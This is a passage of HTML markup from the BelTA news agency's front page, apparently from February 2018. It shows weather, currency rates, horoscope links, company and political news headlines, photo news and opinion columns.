                                    <div class="cityDownItem" onclick="setAction('selCity', 'cityName', '17', this, 'city_hidden');get_page('/meteo/blockInner/17','fp_weather_info', 0, '', '', 1);set_cookie('city', '17')">Москва</div>
                                    <div class="cityDownItem" onclick="setAction('selCity', 'cityName', '9', this, 'city_hidden');get_page('/meteo/blockInner/9','fp_weather_info', 0, '', '', 1);set_cookie('city', '9')">Орша</div>
                                    <div class="cityDownItem" onclick="setAction('selCity', 'cityName', '5', this, 'city_hidden');get_page('/meteo/blockInner/5','fp_weather_info', 0, '', '', 1);set_cookie('city', '5')">Полоцк</div>
                                    <div class="cityDownItem" onclick="setAction('selCity', 'cityName', '4', this, 'city_hidden');get_page('/meteo/blockInner/4','fp_weather_info', 0, '', '', 1);set_cookie('city', '4')">Рига</div>
                                    <div class="cityDownItem" onclick="setAction('selCity', 'cityName', '3', this, 'city_hidden');get_page('/meteo/blockInner/3','fp_weather_info', 0, '', '', 1);set_cookie('city', '3')">Санкт-Петербург</div>
                                    <div class="cityDownItem" onclick="setAction('selCity', 'cityName', '2', this, 'city_hidden');get_page('/meteo/blockInner/2','fp_weather_info', 0, '', '', 1);set_cookie('city', '2')">Солигорск</div>
                             </div> 
                                      </form>
    <div class="clear"></div>
</div>
<div id="fp_weather_info">
        <div class="weather_block_item">
        <img src="/desimages/weather_night.png" title="Ночь" alt="Ночь" class="weather_daytime"/>    
        -6..-8&deg;C
                                <img src="/desimages/n_OVC.png" title="Сплошная облачность. снег"  alt="Сплошная облачность" class="weather_clouds"/>
    </div>
    <div class="weather_block_item">
        <img src="/desimages/weather_day.png" title="День" alt="День" class="weather_daytime"/>    
        -3..-5&deg;C
                                <img src="/desimages/d_OVC.png" title="Сплошная облачность"  alt="Сплошная облачность" class="weather_clouds"/>
    </div>
<a href="http://www.belta.by/meteo/getWeather/12" class="fp_kurs_more">Подробнее погода на 6 дней</a></div>
    <a href="/shtorm/" class="kurse_more_best" title="МЧС предупреждает">МЧС предупреждает</a>
</div>
            	               
                            <div class="bans bannerLeftCol">
                    <a href="http://atom.belta.by/ru" title="Атомная энергетика"  target ="_blank">
                        <img src="http://www.belta.by/images/storage/banners/000147_afde759ac9f76a11b72fe55a3f9fa52b_work.jpg" alt="Атомная энергетика" title="Атомная энергетика" />
                    </a>
                </div>                    
           
                    
    
    	
	<div class="fp_newsConmpanyBlock newsConmpanyBlock">
    <div class="fp_block_title"><a href="/newscompany/" title="Новости компаний">Новости компаний</a></div>
<div class="fp_newsConmpanyBlock_inner">
    <div id="newsCompany">
	          	           	                <div class="lenta_item">
                <a href="http://www.belta.by/newscompany/view/mogilevhimvolokno-nachnet-vypusk-sovremennogo-poliefirnogo-volokna-v-ijule-287985-2018/"  
                   title="&quot;Могилевхимволокно&quot; начнет выпуск современного полиэфирного волокна в июле">"Могилевхимволокно" начнет выпуск современного полиэфирного волокна в июле
                </a>
                <div class="fp_date"></div>
            </div>
	          	           	                <div class="lenta_item">
                <a href="http://www.belta.by/newscompany/view/turovskij-molochnyj-kombinat-zapustil-novye-linii-po-proizvodstvu-polutverdyh-i-mjagkih-syrov-287719-2018/"  
                   title="Туровский молочный комбинат запустил новые линии по производству полутвердых и мягких сыров">Туровский молочный комбинат запустил новые линии по производству полутвердых и мягких сыров
                </a>
                <div class="fp_date"></div>
            </div>
	          	           	                <div class="lenta_item">
                <a href="http://www.belta.by/newscompany/view/otkryto-konkursnoe-proizvodstvo-po-delu-o-bankrotstve-chashnikskoj-mezhrajonnoj-bazy-287705-2018/"  
                   title="Открыто конкурсное производство по делу о банкротстве Чашникской межрайонной базы">Открыто конкурсное производство по делу о банкротстве Чашникской межрайонной базы
                </a>
                <div class="fp_date"></div>
            </div>
	          	           	                <div class="lenta_item">
                <a href="http://www.belta.by/newscompany/view/novyj-azotnyj-kompleks-planiruetsja-postroit-na-grodno-azot-287638-2018/"  
                   title="Новый азотный комплекс планируется построить на &quot;Гродно Азот&quot;">Новый азотный комплекс планируется построить на "Гродно Азот"
                </a>
                <div class="fp_date"></div>
            </div>
	          	           	                <div class="lenta_item">
                <a href="http://www.belta.by/newscompany/view/belarusbanku-v-2018-godu-kompensirujut-poteri-ot-predostavlenija-kredita-orshanskomu-lnokombinatu-287586-2018/"  
                   title="Беларусбанку в 2018 году компенсируют потери от предоставления кредита Оршанскому льнокомбинату">Беларусбанку в 2018 году компенсируют потери от предоставления кредита Оршанскому льнокомбинату
                </a>
                <div class="fp_date"></div>
            </div>
	          	           	                <div class="lenta_item">
                <a href="http://www.belta.by/newscompany/view/ruzhanskaja-mebelnaja-fabrika-vozobnovit-rabotu-v-fevrale-287479-2018/"  
                   title="Ружанская мебельная фабрика возобновит работу в феврале">Ружанская мебельная фабрика возобновит работу в феврале
                </a>
                <div class="fp_date"></div>
            </div>
	          	           	                <div class="lenta_item">
                <a href="http://www.belta.by/newscompany/view/pravitelstvo-predostavit-belagroprombanku-i-belarusbanku-garantii-po-kreditam-4-predprijatij-vitebskoj-287392-2018/"  
                   title="Правительство предоставит Белагропромбанку и Беларусбанку гарантии по кредитам 4 предприятий Витебской области">Правительство предоставит Белагропромбанку и Беларусбанку гарантии по кредитам 4 предприятий Витебской области
                </a>
                <div class="fp_date"></div>
            </div>
	          	           	                <div class="lenta_item">
                <a href="http://www.belta.by/newscompany/view/orshanskij-hlebozavod-v-2018-godu-v-15-raza-uvelichit-vypusk-podovyh-hlebov-287331-2018/"  
                   title="Оршанский хлебозавод в 2018 году в 1,5 раза увеличит выпуск подовых хлебов">Оршанский хлебозавод в 2018 году в 1,5 раза увеличит выпуск подовых хлебов
                </a>
                <div class="fp_date"></div>
            </div>
	          	           	                <div class="lenta_item">
                <a href="http://www.belta.by/newscompany/view/bmz-pochti-v-pjat-raz-uvelichil-pribyl-ot-realizatsii-produktsii-v-2017-godu-286273-2018/"  
                   title="БМЗ почти в пять раз увеличил прибыль от реализации продукции в 2017 году">БМЗ почти в пять раз увеличил прибыль от реализации продукции в 2017 году
                </a>
                <div class="fp_date"></div>
            </div>
	          	           	                <div class="lenta_item">
                <a href="http://www.belta.by/newscompany/view/novaja-linija-separirovanija-torfa-zarabotaet-na-vitebskoblgaze-286169-2018/"  
                   title="Новая линия сепарирования торфа заработает на &quot;Витебскоблгазе&quot;">Новая линия сепарирования торфа заработает на "Витебскоблгазе"
                </a>
                <div class="fp_date"></div>
            </div>
    </div>
</div>
</div>
        <div class="clear"></div>
        
                <div class="kurs_block">
    <div class="fp_block_title">Курсы валют</div>
    <table>
        <tr class="kurs_block_title">
            <th rowspan="2">Нацбанк</th>
            <th colspan="2">Лучшие курсы</th>
        </tr>
        <tr class="kurs_block_title">
            <th>Покупка</th>
            <th>Продажа</th>
        </tr>
                  <tr class="kurs_row_title">
            <td colspan="3">
                <b>EUR</b>
                <img src="http://www.belta.by/images/storage/kurs/000120_602513.png"/>            </td>
          </tr>
          <tr>
            <td>2.4665 BYN</td>
            <td>
                2.462 BYN
            </td>    
            <td>2.467 BYN</td> 
          </tr>
                  <tr class="kurs_row_title">
            <td colspan="3">
                <b>USD</b>
                <img src="http://www.belta.by/images/storage/kurs/000120_609568.png"/>            </td>
          </tr>
          <tr>
            <td>1.9808 BYN</td>
            <td>
                1.976 BYN
            </td>    
            <td>1.98 BYN</td> 
          </tr>
                  <tr class="kurs_row_title">
            <td colspan="3">
                <b>RUB</b>
                <img src="http://www.belta.by/images/storage/kurs/000120_427690.png"/>            </td>
          </tr>
          <tr>
            <td>3.5005 BYN</td>
            <td>
                3.485 BYN
            </td>    
            <td>3.505 BYN</td> 
          </tr>
            </table>


    <a href="http://www.belta.by/currency/getAllCurrenciesOfNB" class="kurse_more_nb">Подробнее курсы валют нацбанка</a>
    <a href="http://www.belta.by/currency/" class="kurse_more_best">Лучшие курсы</a>
</div>
        
                    <div class="fp_newsTVBlock">
        <div class="fp_block_title">ТВ программа</div>
                                                <iframe width="225" height="86" frameborder="0" scrolling="no" src="http://tv.belta.by/tvinformer/?ids=140_89_137_85_139_138_86_87_88">&nbsp;<!--LiveInternet counter--><script type="text/javascript"><!--
new Image().src = "//counter.yadro.ru/hit?r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";h"+escape(document.title.substring(0,80))+
";"+Math.random();//--></script><!--/LiveInternet--></iframe>

                    
                
        </div>

        <div class="clear"></div>
        
                            <div class="fp_horo">
            <div class="fp_block_title">Гороскоп</div>
            <div class="horo_line">
                  
            

                       
                            <a href="/horoscope/sign/1" title="Овен"><img title="Овен" alt="Овен" src="http://www.belta.by/images/storage/horoscope/thumb/oven.png"/></a>
                         
            

                       
                            <a href="/horoscope/sign/2" title="Телец"><img title="Телец" alt="Телец" src="http://www.belta.by/images/storage/horoscope/thumb/telets.png"/></a>
                         
            

                       
                            <a href="/horoscope/sign/3" title="Близнецы"><img title="Близнецы" alt="Близнецы" src="http://www.belta.by/images/storage/horoscope/thumb/bliznetsy.png"/></a>
                                    </div>
            <div class="horo_line">
             
            

                       
                            <a href="/horoscope/sign/4" title="Рак "><img title="Рак " alt="Рак " src="http://www.belta.by/images/storage/horoscope/thumb/rak.png"/></a>
                         
            

                       
                            <a href="/horoscope/sign/5" title="Лев"><img title="Лев" alt="Лев" src="http://www.belta.by/images/storage/horoscope/thumb/lev.png"/></a>
                         
            

                       
                            <a href="/horoscope/sign/6" title="Дева "><img title="Дева " alt="Дева " src="http://www.belta.by/images/storage/horoscope/thumb/deva.png"/></a>
                                    </div>
            <div class="horo_line">
             
            

                       
                            <a href="/horoscope/sign/7" title="Весы"><img title="Весы" alt="Весы" src="http://www.belta.by/images/storage/horoscope/thumb/000124_329904.jpg"/></a>
                         
            

                       
                            <a href="/horoscope/sign/8" title="Скорпион"><img title="Скорпион" alt="Скорпион" src="http://www.belta.by/images/storage/horoscope/thumb/000124_967140.jpg"/></a>
                         
            

                       
                            <a href="/horoscope/sign/9" title="Стрелец"><img title="Стрелец" alt="Стрелец" src="http://www.belta.by/images/storage/horoscope/thumb/000124_32965.jpg"/></a>
                                    </div>
            <div class="horo_line">
             
            

                       
                            <a href="/horoscope/sign/10" title="Козерог"><img title="Козерог" alt="Козерог" src="http://www.belta.by/images/storage/horoscope/thumb/000124_700070.jpg"/></a>
                         
            

                       
                            <a href="/horoscope/sign/11" title="Водолей"><img title="Водолей" alt="Водолей" src="http://www.belta.by/images/storage/horoscope/thumb/000124_523075.jpg"/></a>
                         
            

                       
                            <a href="/horoscope/sign/12" title="Рыбы"><img title="Рыбы" alt="Рыбы" src="http://www.belta.by/images/storage/horoscope/thumb/000124_104563.jpg"/></a>
                         
     
    </div>
    <div class="clear"></div>
    <a class="horo_more" href="/horoscope/horoMonth" title="Ежемесячный гороскоп">Ежемесячный гороскоп</a>
    </div>

            	    </div>
    <div class="clear"></div>
    <div class="sp_vfi">
    <div class="sp_video">
<div class="fp_video_b">
    <h2 class="fp_title"><a href="http://www.belta.by/video/" title="Все видео">Видео</a></h2>	
		    			     
        <div id="fp_video_view">
                        <iframe frameborder="0" allowfullscreen="" src="https://www.youtube.com/embed/m94fNG34FuE?rel=0
"></iframe>
     
            
        </div>
            <div class="sp_video_title">Как защитить компьютер от скрытого майнинга</div>
            <div class="all_photonews all_photonews_sp"><a href="http://www.belta.by/video/" title="Все видео">Все видео</a></div>
</div>
 </div>
    <div class="sp_vfi_empty"></div>
    <div class="sp_photo">	<h2 class="fp_title"><a href="http://www.belta.by/photonews/" title="Все фото">Фотоновости</a></h2>
            <div class="photonews_big_item_sp">
                            <a href="http://www.belta.by/photonews/view/jubilejnaja-vystavka-leonida-schemeleva-otkrylas-v-natsionalnom-hudozhestvennom-muzee-10996/" 
                   title="">
                    <img src="http://www.belta.by/images/storage/photonews/000049_1517845199_inmain.jpg" 
                         alt="" 
                         title=""/>
                    <span>Юбилейная выставка Леонида Щемелева открылась в Национальном художественном музее</span>
                </a>
                        
	</div>
        <div class="photonews_inner_sp">
                            <div>
            <a href="http://www.belta.by/photonews/view/energetiki-vedut-vosstanovitelnye-raboty-v-gomelskom-rajone-10995/" 
               title="Энергетики ведут восстановительные работы в Гомельском районе">
                <img src="http://www.belta.by/images/storage/photonews/000049_1517839510_medium.jpg" 
                     alt="" 
                     title=""/>
            </a>
            </div>
        
                            <div>
            <a href="http://www.belta.by/photonews/view/v-vitebske-proshel-oblastnoj-etap-sorevnovanij-snezhnyj-snajper-10994/" 
               title="В Витебске прошел областной этап соревнований &quot;Снежный снайпер&quot;">
                <img src="http://www.belta.by/images/storage/photonews/000049_1517838503_medium.jpg" 
                     alt="" 
                     title=""/>
            </a>
            </div>
        
    </div>
<div class="all_photonews all_photonews_sp"><a href="http://www.belta.by/photonews/" title="Все фото">Все фото</a></div>

</div>
    <div class="sp_vfi_empty"></div>
    <div class="sp_infogr"><h2 class="fp_title"><a href="http://www.belta.by/infographica/" title="Вся инфографика">Инфографика</a></h2>

	<div class="photonews_big_item_sp">
                        <a href="http://www.belta.by/infographica/view/v-belarusi-snizhaetsja-chislo-osuzhdennyh-za-narkoprestuplenija-10993/" title="В Беларуси снижается число осужденных за наркопреступления">
                <img src="http://www.belta.by/images/storage/photonews/000048_1517837794_medium.jpg" alt="" title=""/>
            </a>
            
                    </div>
        <div class="photonews_big_item_inf_sp">
            <a href="http://www.belta.by/infographica/view/v-belarusi-snizhaetsja-chislo-osuzhdennyh-za-narkoprestuplenija-10993/" title="В Беларуси снижается число осужденных за наркопреступления">В Беларуси снижается число осужденных за наркопреступления</a>
            Число несовершеннолетних, осужденных за наркопреступления с целью сбыта уменьшилось.
          
            <div class="clear"></div>
	</div>

<div class="all_photonews all_photonews_sp"><a href="http://www.belta.by/infographica/" title="Вся инфографика">Вся инфографика</a></div>

</div>
</div>
        <div class="table_1200">
                            <div class="sp_rubric_block">
    <div class="sp_rb_title"><a href="http://www.belta.by/president/" title="Президент">Президент</a></div>
    <div class="sp_rb_content">
<div class="sp_rb_main_item">
	    	    	     	<a href="http://www.belta.by/president/view/stesnjatsja-starogo-nechego-lukashenko-podcherkivaet-osobuju-rol-kgb-v-obespechenii-bezopasnosti-strany-287454-2018/"  title="&quot;Стесняться старого нечего&quot; - Лукашенко подчеркивает особую роль КГБ в обеспечении безопасности страны" >
            <img src="http://www.belta.by/images/storage/news/000019_1517475810_small.jpg" alt="Александр Лукашенко и Валерий Вакульчик" title="Александр Лукашенко и Валерий Вакульчик"/>
    </a>
<a href="http://www.belta.by/president/view/stesnjatsja-starogo-nechego-lukashenko-podcherkivaet-osobuju-rol-kgb-v-obespechenii-bezopasnosti-strany-287454-2018/"  title="&quot;Стесняться старого нечего&quot; - Лукашенко подчеркивает особую роль КГБ в обеспечении безопасности страны">
    "Стесняться старого нечего" - Лукашенко подчеркивает особую роль КГБ в обеспечении безопасности страны
     
    </a>
</div>
<div class="sp_rb_items">
	          	           	        <div class="sp_rb_item">
	<a href="http://www.belta.by/president/view/lukashenko-pozdravil-anastasiadisa-s-pereizbraniem-prezidentom-kipra-287957-2018/"  title="Лукашенко поздравил Анастасиадиса с переизбранием Президентом Кипра">
            Лукашенко поздравил Анастасиадиса с переизбранием Президентом Кипра
             
            	</a>
        
    </div>
	          	           	        <div class="sp_rb_item">
	<a href="http://www.belta.by/president/view/prezident-belarusi-s-imenem-schemeleva-svjazany-znachitelnye-dostizhenija-belorusskoj-shkoly-zhivopisi-287941-2018/"  title="Президент Беларуси: с именем Щемелева связаны значительные достижения белорусской школы живописи">
            Президент Беларуси: с именем Щемелева связаны значительные достижения белорусской школы живописи
             
            	</a>
        
    </div>
</div>
</div>
</div>

                
            
                                    <div class="sp_rubric_block">
    <div class="sp_rb_title"><a href="http://www.belta.by/politics/" title="Политика">Политика</a></div>
    <div class="sp_rb_content">
<div class="sp_rb_main_item">
	    	    	     	<a href="http://www.belta.by/politics/view/belarus-pridaet-bolshoe-znachenie-razvitiju-konstruktivnyh-otnoshenij-so-shvejtsariej-andrejchenko-287861-2018/"  title="Беларусь придает большое значение развитию конструктивных отношений со Швейцарией - Андрейченко" >
            <img src="http://www.belta.by/images/storage/news/000020_1517732531_small.jpg" alt="" title=""/>
    </a>
<a href="http://www.belta.by/politics/view/belarus-pridaet-bolshoe-znachenie-razvitiju-konstruktivnyh-otnoshenij-so-shvejtsariej-andrejchenko-287861-2018/"  title="Беларусь придает большое значение развитию конструктивных отношений со Швейцарией - Андрейченко">
    Беларусь придает большое значение развитию конструктивных отношений со Швейцарией - Андрейченко
     
    </a>
</div>
<div class="sp_rb_items">
	          	           	        <div class="sp_rb_item">
	<a href="http://www.belta.by/politics/view/torgovo-ekonomicheskoe-sotrudnichestvo-belarusi-i-laosa-imeet-potentsial-dlja-razvitija-posol-288054-2018/"  title="Торгово-экономическое сотрудничество Беларуси и Лаоса имеет потенциал для развития - посол">
            Торгово-экономическое сотрудничество Беларуси и Лаоса имеет потенциал для развития - посол
             
            	</a>
        
    </div>
	          	           	        <div class="sp_rb_item">
	<a href="http://www.belta.by/politics/view/uchastie-v-regionalnom-forume-natsionalnyh-koordinatorov-po-tsur-v-minske-podtverdili-25-gosudarstv-287898-2018/"  title="Участие в региональном форуме национальных координаторов по ЦУР в Минске подтвердили 25 государств">
            Участие в региональном форуме национальных координаторов по ЦУР в Минске подтвердили 25 государств
             
            	</a>
        
    </div>
</div>
</div>
</div>

                
            
                                    <div class="sp_rubric_block">
    <div class="sp_rb_title"><a href="http://www.belta.by/economics/" title="Экономика">Экономика</a></div>
    <div class="sp_rb_content">
<div class="sp_rb_main_item">
	    	    	     	<a href="http://www.belta.by/economics/view/rusyj-orientiruet-minselhozprod-na-proizvodstvo-produktsii-s-vysokoj-dobavlennoj-stoimostjju-288045-2018/"  title="Русый ориентирует Минсельхозпрод на производство продукции с высокой добавленной стоимостью" >
            <img src="http://www.belta.by/images/storage/news/000021_1517841054_small.jpg" alt="Михаил Русый. Фото из архива" title="Михаил Русый. Фото из архива"/>
    </a>
<a href="http://www.belta.by/economics/view/rusyj-orientiruet-minselhozprod-na-proizvodstvo-produktsii-s-vysokoj-dobavlennoj-stoimostjju-288045-2018/"  title="Русый ориентирует Минсельхозпрод на производство продукции с высокой добавленной стоимостью">
    Русый ориентирует Минсельхозпрод на производство продукции с высокой добавленной стоимостью
     
    </a>
</div>
<div class="sp_rb_items">
	          	           	        <div class="sp_rb_item">
	<a href="http://www.belta.by/economics/view/srochnye-rublevye-depozity-fizlits-v-2017-godu-v-belarusi-vyrosli-na-132-288021-2018/"  title="Срочные рублевые депозиты физлиц в 2017 году в Беларуси выросли на 13,2%">
            Срочные рублевые депозиты физлиц в 2017 году в Беларуси выросли на 13,2%
             
            	</a>
        
    </div>
	          	           	        <div class="sp_rb_item">
	<a href="http://www.belta.by/economics/view/itogi-nedeli-na-belorusskom-valjutnom-rynke-288019-2018/"  title="Итоги недели на белорусском валютном рынке">
            Итоги недели на белорусском валютном рынке
             
            <span class="with_photo"></span>	</a>
        
    </div>
</div>
</div>
</div>

                
            
                                    <div class="sp_rubric_block">
    <div class="sp_rb_title"><a href="http://www.belta.by/incident/" title="Происшествия">Происшествия</a></div>
    <div class="sp_rb_content">
<div class="sp_rb_main_item">
	    	    	     	<a href="http://www.belta.by/incident/view/gospogrankomitet-opublikoval-video-top-5-proisshestvij-na-granitse-v-2017-godu-287950-2018/"  title="Госпогранкомитет опубликовал видео топ-5 происшествий на границе в 2017 году" >
            <img src="http://www.belta.by/images/storage/news/000024_1517819323_small.jpg" alt="Фото из архива" title="Фото из архива"/>
    </a>
<a href="http://www.belta.by/incident/view/gospogrankomitet-opublikoval-video-top-5-proisshestvij-na-granitse-v-2017-godu-287950-2018/"  title="Госпогранкомитет опубликовал видео топ-5 происшествий на границе в 2017 году">
    Госпогранкомитет опубликовал видео топ-5 происшествий на границе в 2017 году
     
    </a>
</div>
<div class="sp_rb_items">
	          	           	        <div class="sp_rb_item">
	<a href="http://www.belta.by/incident/view/paviljon-s-bytovoj-himiej-gorel-na-mini-rynke-v-pinske-288067-2018/"  title="Павильон с бытовой химией горел на мини-рынке в Пинске">
            Павильон с бытовой химией горел на мини-рынке в Пинске
             
            <span class="with_photo"></span>	</a>
        
    </div>
	          	           	        <div class="sp_rb_item">
	<a href="http://www.belta.by/incident/view/v-gluske-legkovushka-vyletela-na-trotuar-i-sbila-dvuh-peshehodov-288062-2018/"  title="В Глуске легковушка вылетела на тротуар и сбила двух пешеходов">
            В Глуске легковушка вылетела на тротуар и сбила двух пешеходов
             
            	</a>
        
    </div>
</div>
</div>
</div>

                
            
                                    <div class="sp_rubric_block">
    <div class="sp_rb_title"><a href="http://www.belta.by/society/" title="Общество">Общество</a></div>
    <div class="sp_rb_content">
<div class="sp_rb_main_item">
	    	    	     	<a href="http://www.belta.by/society/view/elektronnye-jarmarki-vakansij-planiruetsja-provodit-v-belarusi-288030-2018/"  title="Электронные ярмарки вакансий планируется проводить в Беларуси" >
            <img src="http://www.belta.by/images/storage/news/000022_1517837123_small.jpg" alt="Фото из архива" title="Фото из архива"/>
    </a>
<a href="http://www.belta.by/society/view/elektronnye-jarmarki-vakansij-planiruetsja-provodit-v-belarusi-288030-2018/"  title="Электронные ярмарки вакансий планируется проводить в Беларуси">
    Электронные ярмарки вакансий планируется проводить в Беларуси
     
    </a>
</div>
<div class="sp_rb_items">
	          	           	        <div class="sp_rb_item">
	<a href="http://www.belta.by/society/view/na-etoj-stranitse-5-fevralja-budut-opublikovany-pobediteli-rozygrysha-54-go-tura-igry-udacha-v-pridachu-287263-2018/"  title="Оперная дива Анастасия Малашкевич разыграла 34-ю квартиру от &quot;Евроопт&quot;! А обладателей автомобилей и крупных денежных призов определили сами покупатели!">
            Оперная дива Анастасия Малашкевич разыграла 34-ю квартиру от "Евроопт"! А обладателей автомобилей и крупных денежных призов определили сами покупатели!
            <span class="with_video"></span> 
            <span class="with_photo"></span>	</a>
        
    </div>
	          	           	        <div class="sp_rb_item">
	<a href="http://www.belta.by/society/view/na-etoj-stranitse-5-fevralja-budet-vestis-prjamaja-transljatsija-rozygrysha-54-go-tura-igry-udacha-v-287262-2018/"  title="Кому достанется 34-я квартира от &quot;Евроопт&quot; и три автомобиля &quot;Сузуки Витара&quot;? Смотрите в прямом эфире на телеканале ОНТ в 18.20!">
            Кому достанется 34-я квартира от "Евроопт" и три автомобиля "Сузуки Витара"? Смотрите в прямом эфире на телеканале ОНТ в 18.20!
             
            <span class="with_photo"></span>	</a>
        
    </div>
</div>
</div>
</div>

                
                    </div>
                                    <div class="press_block" id="experts">
<div class="press_block_titles" id="experts_titles">
    <div class="press_block_title_active" id="op_0"><a onclick="return change_experts('op_0')" title="Эксперты">Эксперты</a></div>
            <div id="op_50"><a onclick="return change_experts('op_50')"  href="http://www.belta.by/opinions/" title="Мнения">Мнения</a></div>
                                                <div id="op_51"><a onclick="return change_experts('op_51')"  href="http://www.belta.by/comments/" title="Комментарии">Комментарии</a></div>
                                                <div id="op_52"><a onclick="return change_experts('op_52')"  href="http://www.belta.by/interview/" title="Интервью">Интервью</a></div>
                                                <div id="op_282"><a onclick="return change_experts('op_282')"  href="http://www.belta.by/columnists/" title="Колумнисты">Колумнисты</a></div>
                    </div>
<div class="clear"></div>
<div class="press_content">
        	                		                                                                                    <div class="press_wrap" id="op_50_info">
                    <div class="press_all"><a href="/opinions/" title="Все мнения">Все мнения</a></div>
                                                     	    	    	                <a href="http://www.belta.by/opinions/view/zakon-ob-informatsii-neobhodimo-sovershenstvovat-6035/"  title="Закон об информации необходимо совершенствовать" class="press_wrap_title">
                            <span class="press_img"><img src="http://www.belta.by/images/storage/person/thumb/000057_208137.jpg" alt="Закон об информации необходимо совершенствовать" title="Закон об информации необходимо совершенствовать"/><span class="press_rubric">Мнения</span></span>
                        <span>Вадим Ипатов</span>Закон об информации необходимо совершенствовать
            </a>
                                 	    	    	                <a href="http://www.belta.by/opinions/view/it-tehnologii-dolzhny-aktivnee-vnedrjatsja-v-sistemu-zdravoohranenija-6030/"  title="IT-технологии должны активнее внедряться в систему здравоохранения" class="press_wrap_title">
                            <span class="press_img"><img src="http://www.belta.by/images/storage/person/thumb/000057_459781.jpg" alt="IT-технологии должны активнее внедряться в систему здравоохранения" title="IT-технологии должны активнее внедряться в систему здравоохранения"/><span class="press_rubric">Мнения</span></span>
                        <span>Валерий Малашко</span>IT-технологии должны активнее внедряться в систему здравоохранения
            </a>
                                 	    	    	                <a href="http://www.belta.by/opinions/view/reorganizatsija-apk-pridala-moschnyj-impuls-razvitiju-selhozproizvodstva-vitebskoj-oblasti-6029/"  title="Реорганизация АПК придала мощный импульс развитию сельхозпроизводства Витебской области" class="press_wrap_title">
                            <span class="press_img"><img src="http://www.belta.by/images/storage/person/thumb/000057_402347.jpg" alt="Реорганизация АПК придала мощный импульс развитию сельхозпроизводства Витебской области" title="Реорганизация АПК придала мощный импульс развитию сельхозпроизводства Витебской области"/><span class="press_rubric">Мнения</span></span>
                        <span>Леонид Анфимов</span>Реорганизация АПК придала мощный импульс развитию сельхозпроизводства Витебской области
            </a>
                                 	    	    	                <a href="http://www.belta.by/opinions/view/kompleksnyj-podhod-k-uluchsheniju-uslovij-biznesa-posposobstvuet-sozdaniju-novyh-rabochih-mest-6026/"  title="Комплексный подход к улучшению условий бизнеса поспособствует созданию новых рабочих мест" class="press_wrap_title">
                            <span class="press_img"><img src="http://www.belta.by/images/storage/person/thumb/000057_141966.jpg" alt="Комплексный подход к улучшению условий бизнеса поспособствует созданию новых рабочих мест" title="Комплексный подход к улучшению условий бизнеса поспособствует созданию новых рабочих мест"/><span class="press_rubric">Мнения</span></span>
                        <span>Владимир Кравцов</span>Комплексный подход к улучшению условий бизнеса поспособствует созданию новых рабочих мест
            </a>
                                 	    	    	                <a href="http://www.belta.by/opinions/view/dekret-o-tsifrovoj-ekonomike-pridast-novyj-impuls-razvitiju-realnogo-sektora-ekonomiki-6023/"  title="Декрет о цифровой экономике придаст новый импульс развитию реального сектора экономики" class="press_wrap_title">
                            <span class="press_img"><img src="http://www.belta.by/images/storage/person/thumb/000057_592118.jpg" alt="Декрет о цифровой экономике придаст новый импульс развитию реального сектора экономики" title="Декрет о цифровой экономике придаст новый импульс развитию реального сектора экономики"/><span class="press_rubric">Мнения</span></span>
                        <span>Михаил Орда</span>Декрет о цифровой экономике придаст новый импульс развитию реального сектора экономики
            </a>
                    
                </div>
	                		                                                                                    <div class="press_wrap" id="op_51_info">
                    <div class="press_all"><a href="/comments/" title="Все комментарии">Все комментарии</a></div>
                                                     	    	    	                <a href="http://www.belta.by/comments/view/s-prilavkov-ischeznut-smetanka-tvorozhochek-i-maslitse-6024/"  title="С прилавков исчезнут &quot;сметанка&quot;, &quot;творожочек&quot; и &quot;маслице&quot;" class="press_wrap_title">
                            <span class="press_img"><img src="http://www.belta.by/images/storage/opinion/thumb/000052_23159.jpg" alt="С прилавков исчезнут &quot;сметанка&quot;, &quot;творожочек&quot; и &quot;маслице&quot;" title="С прилавков исчезнут &quot;сметанка&quot;, &quot;творожочек&quot; и &quot;маслице&quot;"/><span class="press_rubric">Комментарии</span></span>
                        <span> </span>С прилавков исчезнут "сметанка", "творожочек" и "маслице"
            </a>
                                 	    	    	                <a href="http://www.belta.by/comments/view/kommunalka-po-polochkam-naskolko-potjazhelejut-zhirovki-minchan-za-janvar-6010/"  title="Коммуналка по полочкам - насколько потяжелеют жировки минчан за январь" class="press_wrap_title">
                            <span class="press_img"><img src="http://www.belta.by/images/storage/opinion/thumb/000052_193558.jpg" alt="Коммуналка по полочкам - насколько потяжелеют жировки минчан за январь" title="Коммуналка по полочкам - насколько потяжелеют жировки минчан за январь"/><span class="press_rubric">Комментарии</span></span>
                        <span> </span>Коммуналка по полочкам - насколько потяжелеют жировки минчан за январь
            </a>
                                 	    	    	                <a href="http://www.belta.by/comments/view/nalogovoe-zakonodatelstvo-2018-chego-zhdat-biznesu-6003/"  title="Налоговое законодательство-2018: чего ждать бизнесу" class="press_wrap_title">
                            <span class="press_img"><img src="http://www.belta.by/images/storage/person/thumb/000057_165471.jpg" alt="Налоговое законодательство-2018: чего ждать бизнесу" title="Налоговое законодательство-2018: чего ждать бизнесу"/><span class="press_rubric">Комментарии</span></span>
                        <span>Элла Селицкая</span>Налоговое законодательство-2018: чего ждать бизнесу
            </a>
                                 	    	    	                <a href="http://www.belta.by/comments/view/vernut-nelzja-poterjat-5995/"  title="Вернуть нельзя потерять" class="press_wrap_title">
                            <span class="press_img"><img src="http://www.belta.by/images/storage/opinion/thumb/000052_790485.jpg" alt="Вернуть нельзя потерять" title="Вернуть нельзя потерять"/><span class="press_rubric">Комментарии</span></span>
                        <span> </span>Вернуть нельзя потерять
            </a>
                                 	    	    	                <a href="http://www.belta.by/comments/view/kartochki-dlja-internet-shoppinga-blokchejn-i-onlajn-kredity-chem-belorusskie-banki-poradujut-v-2018-godu-5994/"  title="Карточки для интернет-шоппинга, блокчейн и онлайн-кредиты - чем белорусские банки порадуют в 2018 году" class="press_wrap_title">
                            <span class="press_img"><img src="http://www.belta.by/images/storage/opinion/thumb/000052_781193.jpg" alt="Карточки для интернет-шоппинга, блокчейн и онлайн-кредиты - чем белорусские банки порадуют в 2018 году" title="Карточки для интернет-шоппинга, блокчейн и онлайн-кредиты - чем белорусские банки порадуют в 2018 году"/><span class="press_rubric">Комментарии</span></span>
                        <span> </span>Карточки для интернет-шоппинга, блокчейн и онлайн-кредиты - чем белорусские банки порадуют в 2018 году
            </a>
                    
                </div>
	                		                                                                                    <div class="press_wrap" id="op_52_info">
                    <div class="press_all"><a href="/interview/" title="Все интервью">Все интервью</a></div>
